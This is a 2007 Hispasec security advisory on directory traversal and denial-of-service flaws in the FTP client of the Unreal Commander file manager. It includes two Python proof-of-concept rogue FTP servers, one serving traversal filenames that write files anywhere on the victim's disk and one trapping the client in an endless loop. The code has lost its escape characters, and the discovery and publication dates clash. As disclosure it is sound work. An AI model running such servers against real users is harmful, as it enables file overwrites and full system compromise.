X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities

Advisory Content :

HISPASEC
Security Advisory
http://blog.hispasec.com/lab/

Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
Vulnerable : 0.92 (build 573), 0.92 (build 565), prior also may be
affected

== Abstract ==

Unreal Commander is an award winning freeware file manager for Windows
98/ME/2000/XP/2003/Vista. The application support multiple archive
formats, has a built-in ftp client, and other features.

Unreal Commander fails to correctly handle malformed file name while
downloading
a remote file from a malformed FTP server to a local hard driver. This
allows an
attacker to perform a directory traversal attack. Successful exploitation
may
lead to a full scale system compromise.

Unreal Commander also fails to correctly handle FTP reponses. This can lead
to
the application entering an infinite loop, denying service to the
legitimate
user.

== Details ==

1. Remote FTP Directory Traversal
The FTP feature fails to correctly check the name of a file that is to be
downloaded. This filename can contain backslashes and dots, and these dots
and
backslashes will be used as a part of a file name.
An example file list sent from the FTP server can look like this:
-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28
st..........BackSlashPoC
When the user chooses to download the file (or a directory in which this
file
exists), the Unreal Commander will try to create the file on a local
harddrive
using the dots and backslashes as a part of a name.
Since more then enough .... will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file
can
for example overwrite a critical system file, or create a file in the
Autostart
folder.

See Proof of Concept exploit at the bottom of this advisory.

2. Remote FTP DoS
When connecting to a malformed FTP, the Unreal Commander sends a CWD /
command. If the malformed FTP replies with a "550 CWD Operation not
permitted"
message, the Unreal Commander tries to resend the command. The loop
continues
until the remote FTP answers with a message about operation being
successful.
If the remote FTP disconnects while Unreal Commander is still in the CWD
loop,
the Unreal Commander will continue to remain in the loop.
The Unreal Commander does not react to Cancel/ALT+F4/ESC commands from the
user,
the only way to exit the loop is to terminate the application.

See Proof of Concept exploit at the bottom of this advisory.

== Vendor status and solution ==

The vendor has been informed, but has not yet released a proper patch.

The solution is to check the file names of each file being downloaded from
a
remote unknown FTP.

== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
import socket

TransferSock = 0

def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
print "sendDirList: TransferSock accepted a connection"
sock.send("150 Opening ASCII mode data connection for file listrn");
DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1
02:28 st\..\..\..\..\..\..\BackSlashPoCn");
DataSock.close()
sock.send("226 Transfer complete.rn");
print "sendDirList: Transfer completern"

def sendFile (sock):
(DataSock, Address) = TransferSock.accept()
print "sendDirList: TransferSock accepted a connection"
sock.send("150 Opening BINARY mode data connection for sth (5
bytes)rn");
DataSock.send("Proof of Concept - Remote FTP Client directory
traversal vulnerability (G.C. - Hispasec)");
DataSock.close()
sock.send("226 Transfer complete.rn");
print "sendDirList: Transfer completern"

def handleUSER (sock, cmd, argz): sock.send("331 Password required for
userrn")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.rn")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8rn")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:rn
MDTMrn REST STREAMrn211 Endrn");
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz +
"rn");
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode
(127,0,0,1,10,10)rn");
def handlePWD (sock, cmd, argz): sock.send("257 "/" is current
directory.rn")
def handleCWD (sock, cmd, argz): sock.send("250 Requested file action
okay, completed.rn")
def handleLIST (sock, cmd, argz): sendDirList(sock)
def handleQUIT (sock, cmd, argz):
sock.send("Bye.rn")
sock.close()

def handleRETR (sock, cmd, argz):
if argz == "/":
sendDirList(sock)
else:
sendFile(sock)

def unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation
not permittedrn")

handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'PWD': handlePWD,
'CWD': handleCWD,
'LIST': handleLIST,
'QUIT': handleQUIT,
'RETR': handleRETR
}

ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)

TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)

# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.rn");
end = 0

while not end:
cmd = ClientSock.recv(1024)
print "Debug: recv -> " + cmd.strip()
command = (cmd[0:4]).strip()
argz = ((cmd.strip())[5:]).strip()
handlers.get(command, unknown)(ClientSock, command, argz)

== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP DoS
# by Gynvael Coldwind
import socket

TransferSock = 0

def handleUSER (sock, cmd, argz): sock.send("331 Password required for
userrn")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.rn")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8rn")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:rn
MDTMrn REST STREAMrn211 Endrn");
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz +
"rn");
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode
(127,0,0,1,10,10)rn");
def handleQUIT (sock, cmd, argz):
sock.send("Bye.rn")
sock.close()

def unknown (sock, cmd, argz):
sock.send("550 " + cmd + ": Operation not permittedrn")
print "The Unreal Commander is not in an infinite loop. You may quit
this exploit, the infinite loop will last."

handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'QUIT': handleQUIT
}

ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)

TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)

# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.rn");
end = 0

while not end:
cmd = ClientSock.recv(1024)
print "Debug: recv -> " + cmd.strip()
command = (cmd[0:4]).strip()
argz = ((cmd.strip())[5:]).strip()
handlers.get(command, unknown)(ClientSock, command, argz)

== Disclaimer ==
This document and all the information it contains is provided "as is",
without any warranty. Hispasec Sistemas is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.

Copyright (C) 2007 Hispasec Sistemas.

--
Gynvael Coldwind
mailto: michael AT hispasec DOT com
mailto: gynvael AT vexillium DOT org

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities